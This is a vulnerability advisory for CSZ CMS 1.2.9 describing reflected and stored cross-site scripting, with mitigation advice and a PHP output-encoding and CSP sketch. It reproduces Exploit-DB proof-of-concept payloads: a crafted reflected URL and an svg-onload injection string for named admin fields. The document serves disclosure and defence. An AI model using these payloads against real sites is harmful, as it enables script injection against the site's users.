Vendor: CSZ CMS
By: SunCSR
CVSS: 4.3 (MEDIUM)
CWE: 79 (Cross-Site Scripting)
Product Name: CSZ CMS
Affected Version From: 1.2.9
Affected Version To: 1.2.9
Patch Exists: NO
Related CWE: N/A
CPE: a:cszcms:csz_cms:1.2.9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: CSZ CMS 1.2.9
2020

CSZ CMS 1.2.9 – Multiple Cross-Site Scripting

CSZ CMS 1.2.9 is vulnerable to multiple Cross-Site Scripting (XSS) attacks. Reflected XSS can be triggered by sending a maliciously crafted URL to the application. Stored XSS can be triggered by an editor account with rights to manage banners and plugins. The malicious payload can be injected into the Name, Note, Album Name, Keyword, Short Description, and Category Name fields.

Mitigation:

Input validation should be performed on all user-supplied data to ensure that it does not contain malicious code. Additionally, the application should be configured to use a Content Security Policy (CSP) to help prevent XSS attacks.
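Output encoding at render time is the usual complement to the input validation and CSP described above. The following PHP sketch is an added example, not code from CSZ CMS or from the advisory author: the helper names (`esc_html`, `esc_js`, `render_banner`) and the rendered fragment are hypothetical, and it assumes the reflected URL segment lands in a JavaScript string, which is what the shape of the payload suggests.

```php
<?php
declare(strict_types=1);
// Added example, not CSZ CMS code. Helper names and the rendered fragment are hypothetical.

// Encode for HTML text and quoted attribute values.
function esc_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encode for a JavaScript string literal inside an inline <script>.
// json_encode emits the surrounding quotes; the JSON_HEX_* flags turn
// < > & ' " into \uXXXX so the value cannot close the string or the script element.
function esc_js(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
        | JSON_HEX_QUOT | JSON_INVALID_UTF8_SUBSTITUTE | JSON_THROW_ON_ERROR);
}

// Render a banner-like fragment; each value is encoded for the context it is written into.
// Assumption: the URL segment is echoed into a JS string, as the reflected payload implies.
function render_banner(string $name, string $note, string $path, string $nonce): string
{
    return '<div class="banner" title="' . esc_html($note) . '">' . esc_html($name) . "</div>\n"
         . '<script nonce="' . esc_html($nonce) . '">var currentPath = ' . esc_js($path) . ";</script>\n";
}

// Constructed inputs: the field value and URL segment quoted in the advisory.
$stored    = '<noframes><p title="</noframes><svg/onload=alert(origin)>">';
$reflected = rawurldecode('pluginabc%22%2Dalert%28origin%29%2D%22abc');

// Per-response nonce: inline handlers such as onload= and any script without it are refused.
$nonce = base64_encode(random_bytes(16));
if (PHP_SAPI !== 'cli') {
    header("Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-$nonce'; "
         . "object-src 'none'; base-uri 'none'");
}

echo render_banner($stored, $stored, $reflected, $nonce);
```

With these inputs the stored value is emitted as inert entities (`&lt;noframes&gt;...`) and the reflected value as a single quoted string with `\u0022` in place of each double quote.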

Exploit-DB raw data:

# Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
# Date: 2020/12/28
# Exploit Author: SunCSR
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.2.9
# Tested on: CSZ CMS 1.2.9

1. Reflected XSS
Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc
<http://localhost/pluginabc%22-alert%28origin%29-%22abc>

2. Stored XSS

Use an editor account with rights to manage banners, plugins.

+ Banner Manager:
    - Add or edit banner:
    Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>">

+ Plugin Manager:
    - Add or edit album(/admin/plugin/gallery):
    Album Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Short Description field: <noframes><p title="</noframes><svg/onload=alert(origin)>">

    - Add or edit Category(/admin/plugin/article/):
    Category Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">